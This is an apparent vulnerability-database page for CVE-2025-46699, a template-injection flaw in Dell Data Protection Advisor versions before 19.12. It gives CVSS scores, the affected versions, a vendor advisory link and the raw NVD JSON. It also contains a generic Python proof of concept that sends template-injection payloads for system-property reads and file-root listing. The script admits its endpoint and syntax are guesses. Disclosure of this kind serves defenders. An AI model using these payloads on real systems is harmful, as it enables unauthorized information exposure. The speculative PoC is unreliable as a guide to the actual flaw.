Security Vulnerability Report
CVE-2025-46699 CVSS 4.3 MEDIUM

CVE-2025-46699

Published: 2026-01-23 10:15:53
Last Modified: 2026-01-28 18:59:26

Description

Dell Data Protection Advisor, versions prior to 19.12, contains an Improper Neutralization of Special Elements Used in a Template Engine vulnerability in the Server. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Information exposure.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Note: the score and vector above are the record's secondary metric. The primary metric in the raw JSON below rates the same issue 6.5 MEDIUM with CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N, i.e. confidentiality impact HIGH rather than LOW, so treat the lower figure as the optimistic end of the range when prioritising.

Configurations (Affected Products)

cpe:2.3:a:dell:data_protection_advisor:*:*:*:*:*:*:*:* - VULNERABLE
Dell Data Protection Advisor < 19.12 (the CPE match in the raw JSON below is 19.9 ≤ version < 19.12)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-46699 PoC - Dell Data Protection Advisor Template Injection
# This PoC demonstrates information disclosure via template injection
import requests
import sys

target_url = "http://target-server/api/template"  # Replace with actual endpoint


def test_template_injection(target):
    """Test for template injection vulnerability"""
    headers = {
        'Content-Type': 'application/json',
        'Authorization': 'Bearer <low_privilege_token>'  # Low privilege access
    }
    # Payload to test for template injection and extract system information
    # Using common template engine syntax (adjust based on target engine)
    payloads = [
        # Test payload - should cause error or unexpected behavior if vulnerable
        '{"input":"${7*7}"}',
        # Information disclosure payload
        '{"input":"${T(java.lang.System).getProperty("user.name")}"}',
        # File read attempt (if applicable)
        '{"input":"${T(java.io.File).listRoots()}"}'
    ]
    print(f"[*] Testing CVE-2025-46699 on {target}")
    for i, payload in enumerate(payloads, 1):
        try:
            response = requests.post(target, json={'template': payload},
                                     headers=headers, timeout=10)
            print(f"\n[+] Payload {i} sent")
            print(f"[*] Status Code: {response.status_code}")
            print(f"[*] Response: {response.text[:500]}")
            # Check for successful exploitation indicators
            if '49' in response.text or 'root' in response.text:
                print("[!] Potential vulnerability confirmed - template injection detected")
        except requests.exceptions.RequestException as e:
            print(f"[-] Request failed: {e}")
    print("\n[*] Note: This PoC requires identification of actual vulnerable endpoint")
    print("[*] Refer to Dell advisory DSA-2025-075 for specific remediation")


if __name__ == "__main__":
    if len(sys.argv) > 1:
        test_template_injection(sys.argv[1])
    else:
        print("Usage: python cve-2025-46699_poc.py <target_url>")

References

https://www.dell.com/support/kbdoc/en-us/000281732/dsa-2025-075-security-update-for-dell-data-protection-advisor-for-multiple-component-vulnerabilities (Vendor Advisory, DSA-2025-075)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46699", "sourceIdentifier": "[email protected]", "published": "2026-01-23T10:15:52.847", "lastModified": "2026-01-28T18:59:26.283", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell Data Protection Advisor, versions prior to 19.12, contains an Improper Neutralization of Special Elements Used in a Template Engine vulnerability in the Server. A low privileged attacker with remote access could potentially exploit this vulnerability, leading to Information exposure."}, {"lang": "es", "value": "Dell Data Protection Advisor, versiones anteriores a la 19.12, contiene una vulnerabilidad de neutralización incorrecta de elementos especiales utilizados en un motor de plantillas en el servidor. Un atacante en remoto con pocos privilegios podría, potencialmente, explotar esta vulnerabilidad, lo que podría llevar a la exposición de información."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1336"}]}], 
"configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dell:data_protection_advisor:*:*:*:*:*:*:*:*", "versionStartIncluding": "19.9", "versionEndExcluding": "19.12", "matchCriteriaId": "F993597A-30A5-4D7B-83D9-162CC1899B78"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000281732/dsa-2025-075-security-update-for-dell-data-protection-advisor-for-multiple-component-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}